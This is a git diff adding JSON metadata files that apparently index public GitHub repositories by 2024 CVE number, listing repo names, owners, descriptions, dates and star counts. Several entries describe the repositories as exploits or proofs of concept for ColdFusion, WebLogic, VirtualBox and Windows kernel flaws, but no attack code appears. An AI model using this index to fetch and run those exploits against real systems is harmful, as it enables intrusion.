"watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2054.json b/2024/CVE-2024-2054.json new file mode 100644 index 0000000000..13f3015fdd --- /dev/null +++ b/2024/CVE-2024-2054.json @@ -0,0 +1,33 @@ +[ + { + "id": 777085087, + "name": "CVE-2024-2054", + "full_name": "Madan301\/CVE-2024-2054", + "owner": { + "login": "Madan301", + "id": 111639304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111639304?v=4", + "html_url": "https:\/\/github.com\/Madan301", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Madan301\/CVE-2024-2054", + "description": null, + "fork": false, + "created_at": "2024-03-25T07:01:59Z", + "updated_at": "2024-03-26T05:40:44Z", + "pushed_at": "2024-03-26T18:33:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20656.json b/2024/CVE-2024-20656.json new file mode 100644 index 0000000000..8ef599879b --- /dev/null +++ b/2024/CVE-2024-20656.json @@ -0,0 +1,33 @@ +[ + { + "id": 742476162, + "name": "CVE-2024-20656", + "full_name": "Wh04m1001\/CVE-2024-20656", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2024-20656", + "description": null, + "fork": false, + "created_at": "2024-01-12T15:08:01Z", + "updated_at": "2024-11-21T05:21:02Z", + "pushed_at": "2024-01-14T07:14:33Z", + "stargazers_count": 132, + "watchers_count": 132, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 132, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20666.json b/2024/CVE-2024-20666.json new file mode 100644 index 0000000000..04e18273f0 --- /dev/null +++ b/2024/CVE-2024-20666.json @@ -0,0 +1,70 @@ +[ + { + "id": 758035634, + "name": "Script-For-CVE-2024-20666", + "full_name": "nnotwen\/Script-For-CVE-2024-20666", + "owner": { + "login": "nnotwen", + "id": 112250334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112250334?v=4", + "html_url": "https:\/\/github.com\/nnotwen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nnotwen\/Script-For-CVE-2024-20666", + "description": " PowerShell script that can help you automate updating the Windows Recovery Environment (WinRE) on deployed devices to address the security vulnerabilities in CVE-2024-20666.", + "fork": false, + "created_at": "2024-02-15T13:53:21Z", + "updated_at": "2024-10-20T07:23:08Z", + "pushed_at": "2024-02-15T14:08:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "microsoft", + "patch", + "script", + "update", + "vulnerabilities" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822528570, + "name": "CVE-2024-20666", + "full_name": "invaderslabs\/CVE-2024-20666", + "owner": { + "login": "invaderslabs", + "id": 149894888, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149894888?v=4", + "html_url": "https:\/\/github.com\/invaderslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/invaderslabs\/CVE-2024-20666", + "description": "CVE-2024-20666 vulnerability Solution patch failures in the Windows Recovery Environment (WinRE).", + "fork": false, + "created_at": "2024-07-01T10:14:40Z", + "updated_at": "2024-08-29T13:31:14Z", + "pushed_at": "2024-07-21T13:36:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20696.json b/2024/CVE-2024-20696.json new file mode 100644 index 0000000000..6274feb636 --- /dev/null +++ b/2024/CVE-2024-20696.json @@ -0,0 +1,33 @@ +[ + { + "id": 768940221, + "name": "CVE-2024-20696", + "full_name": "clearbluejar\/CVE-2024-20696", + "owner": { + "login": "clearbluejar", + "id": 3752074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3752074?v=4", + "html_url": "https:\/\/github.com\/clearbluejar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clearbluejar\/CVE-2024-20696", + "description": null, + "fork": false, + "created_at": "2024-03-08T02:31:41Z", + "updated_at": "2024-09-21T07:59:26Z", + "pushed_at": "2024-03-12T13:33:58Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20698.json b/2024/CVE-2024-20698.json new file mode 100644 index 0000000000..a98a28f89f --- /dev/null +++ b/2024/CVE-2024-20698.json @@ -0,0 +1,40 @@ +[ + { + "id": 744332003, + "name": "CVE-2024-20698", + "full_name": "RomanRybachek\/CVE-2024-20698", + "owner": { + "login": "RomanRybachek", + "id": 64448710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64448710?v=4", + "html_url": "https:\/\/github.com\/RomanRybachek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RomanRybachek\/CVE-2024-20698", + "description": "Analysis of the vulnerability", + "fork": false, + "created_at": "2024-01-17T04:35:42Z", + "updated_at": "2024-11-28T07:15:40Z", + "pushed_at": "2024-01-23T16:30:55Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "integer-overflow", + "ntoskrnl", + "reverse-engineering", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 5, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2074.json b/2024/CVE-2024-2074.json new file mode 100644 index 0000000000..e6e70e5ce0 --- /dev/null +++ b/2024/CVE-2024-2074.json @@ -0,0 +1,33 @@ +[ + { + "id": 765177004, + "name": "CVE-2024-2074", + "full_name": "yuziiiiiiiiii\/CVE-2024-2074", + "owner": { + "login": "yuziiiiiiiiii", + "id": 138445912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138445912?v=4", + "html_url": "https:\/\/github.com\/yuziiiiiiiiii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuziiiiiiiiii\/CVE-2024-2074", + "description": "CVE-2024-2074", + "fork": false, + "created_at": "2024-02-29T12:30:37Z", + "updated_at": "2024-03-04T04:25:28Z", + "pushed_at": "2024-02-29T12:37:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20746.json b/2024/CVE-2024-20746.json new file mode 100644 index 0000000000..da9d8efe06 --- /dev/null +++ b/2024/CVE-2024-20746.json @@ -0,0 +1,33 @@ +[ + { + "id": 845363771, + "name": "CVE-2024-20746", + "full_name": "200101WhoAmI\/CVE-2024-20746", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-20746", + "description": "adobe premiere pro", + "fork": false, + "created_at": "2024-08-21T05:29:10Z", + "updated_at": "2024-08-21T05:29:11Z", + "pushed_at": "2024-08-21T05:29:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20767.json b/2024/CVE-2024-20767.json new file mode 100644 index 0000000000..16cd8e1033 --- /dev/null +++ b/2024/CVE-2024-20767.json @@ -0,0 +1,130 @@ +[ + { + "id": 777601582, + "name": "CVE-2024-20767", + "full_name": "yoryio\/CVE-2024-20767", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-20767", + "description": "Exploit for CVE-2024-20767 - Adobe ColdFusion", + "fork": false, + "created_at": "2024-03-26T06:51:08Z", + "updated_at": "2024-11-20T16:30:43Z", + "pushed_at": "2024-03-26T15:52:49Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adobe", + "coldfusion", + "cve-2024-20767" + ], + "visibility": "public", + "forks": 9, + "watchers": 33, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 777677405, + "name": "CVE-2024-20767", + "full_name": "m-cetin\/CVE-2024-20767", + "owner": { + "login": "m-cetin", + "id": 102237861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4", + "html_url": "https:\/\/github.com\/m-cetin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-cetin\/CVE-2024-20767", + "description": "Proof of Concept for CVE-2024-20767. Arbitrary file read from Adobe ColdFusion ", + "fork": false, + "created_at": "2024-03-26T10:03:51Z", + "updated_at": "2024-04-07T07:25:53Z", + "pushed_at": "2024-03-26T10:18:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 777932789, + "name": "CVE-2024-20767", + "full_name": "Chocapikk\/CVE-2024-20767", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-20767", + "description": "Exploit Toolkit for Adobe ColdFusion CVE-2024-20767 Vulnerability", + "fork": false, + "created_at": "2024-03-26T19:17:14Z", + "updated_at": "2024-08-12T20:33:14Z", + "pushed_at": "2024-03-26T19:21:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 780337996, + "name": "CVE-2024-20767-Adobe-ColdFusion", + "full_name": "Praison001\/CVE-2024-20767-Adobe-ColdFusion", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-20767-Adobe-ColdFusion", + "description": "Exploit for CVE-2024-20767 affecting Adobe ColdFusion", + "fork": false, + "created_at": "2024-04-01T09:01:30Z", + "updated_at": "2024-04-01T18:53:20Z", + "pushed_at": "2024-04-01T09:03:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20931.json b/2024/CVE-2024-20931.json new file mode 100644 index 0000000000..3add110d4e --- /dev/null +++ b/2024/CVE-2024-20931.json @@ -0,0 +1,126 @@ +[ + { + "id": 751635756, + "name": "CVE-2024-20931", + "full_name": "GlassyAmadeus\/CVE-2024-20931", + "owner": { + "login": "GlassyAmadeus", + "id": 54050849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54050849?v=4", + "html_url": "https:\/\/github.com\/GlassyAmadeus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GlassyAmadeus\/CVE-2024-20931", + "description": "The Poc for CVE-2024-20931", + "fork": false, + "created_at": "2024-02-02T01:58:49Z", + "updated_at": "2024-11-20T16:30:39Z", + "pushed_at": "2024-02-02T02:05:01Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 71, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 753453515, + "name": "CVE-2024-20931-Poc", + "full_name": "Leocodefocus\/CVE-2024-20931-Poc", + "owner": { + "login": "Leocodefocus", + "id": 7281742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7281742?v=4", + "html_url": "https:\/\/github.com\/Leocodefocus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Leocodefocus\/CVE-2024-20931-Poc", + "description": null, + "fork": false, + "created_at": "2024-02-06T06:35:07Z", + "updated_at": "2024-02-06T15:41:44Z", + "pushed_at": "2024-02-07T00:34:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753513515, + "name": "CVE-2024-20931_weblogic", + "full_name": "ATonysan\/CVE-2024-20931_weblogic", + "owner": { + "login": "ATonysan", + "id": 149130294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149130294?v=4", + "html_url": "https:\/\/github.com\/ATonysan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ATonysan\/CVE-2024-20931_weblogic", + "description": null, + "fork": false, + "created_at": "2024-02-06T09:21:08Z", + "updated_at": "2024-06-15T08:19:03Z", + "pushed_at": "2024-02-06T09:49:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753664721, + "name": "CVE-2024-20931", + "full_name": "dinosn\/CVE-2024-20931", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/CVE-2024-20931", + "description": "CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839", + "fork": false, + "created_at": "2024-02-06T15:09:33Z", + "updated_at": "2024-11-02T04:11:58Z", + "pushed_at": "2024-02-06T15:56:12Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21006.json b/2024/CVE-2024-21006.json new file mode 100644 index 0000000000..fa66183b0e --- /dev/null +++ b/2024/CVE-2024-21006.json @@ -0,0 +1,95 @@ +[ + { + "id": 794384312, + "name": "CVE-2024-21006", + "full_name": "momika233\/CVE-2024-21006", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2024-21006", + "description": null, + "fork": false, + "created_at": "2024-05-01T03:08:48Z", + "updated_at": "2024-11-20T16:30:45Z", + "pushed_at": "2024-05-05T09:40:22Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822946778, + "name": "CVE-2024-21006_jar", + "full_name": "lightr3d\/CVE-2024-21006_jar", + "owner": { + "login": "lightr3d", + "id": 113666792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113666792?v=4", + "html_url": "https:\/\/github.com\/lightr3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lightr3d\/CVE-2024-21006_jar", + "description": "CVE-2024-21006 exp", + "fork": false, + "created_at": "2024-07-02T06:25:14Z", + "updated_at": "2024-11-01T13:02:11Z", + "pushed_at": "2024-07-29T19:39:15Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 833388994, + "name": "CVE-2024-21006", + "full_name": "dadvlingd\/CVE-2024-21006", + "owner": { + "login": "dadvlingd", + "id": 61039959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61039959?v=4", + "html_url": "https:\/\/github.com\/dadvlingd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dadvlingd\/CVE-2024-21006", + "description": null, + "fork": false, + "created_at": "2024-07-25T00:32:00Z", + "updated_at": "2024-11-01T13:03:01Z", + "pushed_at": "2024-07-25T00:39:52Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21107.json b/2024/CVE-2024-21107.json new file mode 100644 index 0000000000..5f74eee180 --- /dev/null +++ b/2024/CVE-2024-21107.json @@ -0,0 +1,33 @@ +[ + { + "id": 787760798, + "name": "CVE-2024-21107", + "full_name": "Alaatk\/CVE-2024-21107", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-21107", + "description": "Oracle VM VirtualBox for Windows prior to 7.0.16 - Elevation of Privileges", + "fork": false, + "created_at": "2024-04-17T06:13:20Z", + "updated_at": "2024-04-17T11:51:14Z", + "pushed_at": "2024-04-17T06:19:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21111.json b/2024/CVE-2024-21111.json new file mode 100644 index 0000000000..80bb7a24f1 --- /dev/null +++ b/2024/CVE-2024-21111.json @@ -0,0 +1,95 @@ +[ + { + "id": 790047378, + "name": "CVE-2024-21111", + "full_name": "mansk1es\/CVE-2024-21111", + "owner": { + "login": "mansk1es", + "id": 74832816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74832816?v=4", + "html_url": "https:\/\/github.com\/mansk1es", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mansk1es\/CVE-2024-21111", + "description": "Oracle VirtualBox Elevation of Privilege (Local Privilege Escalation) Vulnerability", + "fork": false, + "created_at": "2024-04-22T07:05:04Z", + "updated_at": "2024-11-21T05:24:13Z", + "pushed_at": "2024-05-09T16:39:55Z", + "stargazers_count": 216, + "watchers_count": 216, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 216, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 801847759, + "name": "CVE-2024-21111-del", + "full_name": "10cks\/CVE-2024-21111-del", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-21111-del", + "description": null, + "fork": false, + "created_at": "2024-05-17T03:09:54Z", + "updated_at": "2024-05-17T07:56:14Z", + "pushed_at": "2024-05-17T03:13:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810111483, + "name": "CVE-2024-21111", + "full_name": "x0rsys\/CVE-2024-21111", + "owner": { + "login": "x0rsys", + "id": 13172129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13172129?v=4", + "html_url": "https:\/\/github.com\/x0rsys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x0rsys\/CVE-2024-21111", + "description": "Precompiled binaries for Privilege Escalation in Oracle VM Virtual box prior to 7.0.16", + "fork": false, + "created_at": "2024-06-04T04:24:47Z", + "updated_at": "2024-11-14T23:00:05Z", + "pushed_at": "2024-06-04T14:32:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21305.json b/2024/CVE-2024-21305.json new file mode 100644 index 0000000000..37e6eb3ac3 --- /dev/null +++ b/2024/CVE-2024-21305.json @@ -0,0 +1,36 @@ +[ + { + "id": 732514348, + "name": "CVE-2024-21305", + "full_name": "tandasat\/CVE-2024-21305", + "owner": { + "login": "tandasat", + "id": 1620923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4", + "html_url": "https:\/\/github.com\/tandasat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tandasat\/CVE-2024-21305", + "description": "Report and exploit of CVE-2024-21305. ", + "fork": false, + "created_at": "2023-12-16T23:27:34Z", + "updated_at": "2024-11-28T15:39:56Z", + "pushed_at": "2024-01-14T17:21:42Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "hyper-v", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21306.json b/2024/CVE-2024-21306.json new file mode 100644 index 0000000000..1a5dcf565b --- /dev/null +++ b/2024/CVE-2024-21306.json @@ -0,0 +1,64 @@ +[ + { + "id": 783479957, + "name": "C-PoC-for-CVE-2024-21306", + "full_name": "d4rks1d33\/C-PoC-for-CVE-2024-21306", + "owner": { + "login": "d4rks1d33", + "id": 44416061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44416061?v=4", + "html_url": "https:\/\/github.com\/d4rks1d33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4rks1d33\/C-PoC-for-CVE-2024-21306", + "description": null, + "fork": false, + "created_at": "2024-04-08T01:15:21Z", + "updated_at": "2024-04-08T23:57:28Z", + "pushed_at": "2024-04-08T23:59:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796468551, + "name": "BadBlue", + "full_name": "PhucHauDeveloper\/BadBlue", + "owner": { + "login": "PhucHauDeveloper", + "id": 62100779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62100779?v=4", + "html_url": "https:\/\/github.com\/PhucHauDeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PhucHauDeveloper\/BadBlue", + "description": "CVE-2024-21306 BadBlue implementation (Using DuckyScript)", + "fork": false, + "created_at": "2024-05-06T02:05:02Z", + "updated_at": "2024-07-15T10:19:04Z", + "pushed_at": "2024-07-11T05:13:43Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21320.json b/2024/CVE-2024-21320.json new file mode 100644 index 0000000000..3dcff48abb --- /dev/null +++ b/2024/CVE-2024-21320.json @@ -0,0 +1,33 @@ +[ + { + "id": 880686304, + "name": "CVE-2024-21320-POC", + "full_name": "sxyrxyy\/CVE-2024-21320-POC", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-21320-POC", + "description": null, + "fork": false, + "created_at": "2024-10-30T06:58:19Z", + "updated_at": "2024-10-30T06:59:03Z", + "pushed_at": "2024-10-30T06:58:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21338.json b/2024/CVE-2024-21338.json new file mode 100644 index 0000000000..4752f87361 --- /dev/null +++ b/2024/CVE-2024-21338.json @@ -0,0 +1,193 @@ +[ + { + "id": 785999615, + "name": "CVE-2024-21338", + "full_name": "hakaioffsec\/CVE-2024-21338", + "owner": { + "login": "hakaioffsec", + "id": 99059183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99059183?v=4", + "html_url": "https:\/\/github.com\/hakaioffsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hakaioffsec\/CVE-2024-21338", + "description": "Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.", + "fork": false, + "created_at": "2024-04-13T05:53:02Z", + "updated_at": "2024-11-26T14:05:19Z", + "pushed_at": "2024-04-16T21:00:14Z", + "stargazers_count": 287, + "watchers_count": 287, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 60, + "watchers": 287, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 787860602, + "name": "CVE-2024-21338", + "full_name": "UMU618\/CVE-2024-21338", + "owner": { + "login": "UMU618", + "id": 1729732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1729732?v=4", + "html_url": "https:\/\/github.com\/UMU618", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UMU618\/CVE-2024-21338", + "description": "Fork of https:\/\/github.com\/hakaioffsec\/CVE-2024-21338", + "fork": false, + "created_at": "2024-04-17T10:16:21Z", + "updated_at": "2024-06-26T06:01:33Z", + "pushed_at": "2024-04-17T10:33:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790920623, + "name": "CVE-2024-21338", + "full_name": "varwara\/CVE-2024-21338", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-21338", + "description": "PoC for the Untrusted Pointer Dereference in the appid.sys driver", + "fork": false, + "created_at": "2024-04-23T19:09:22Z", + "updated_at": "2024-11-02T20:22:41Z", + "pushed_at": "2024-04-23T19:13:53Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802543804, + "name": "CVE-2024-21338-x64-build-", + "full_name": "Zombie-Kaiser\/CVE-2024-21338-x64-build-", + "owner": { + "login": "Zombie-Kaiser", + "id": 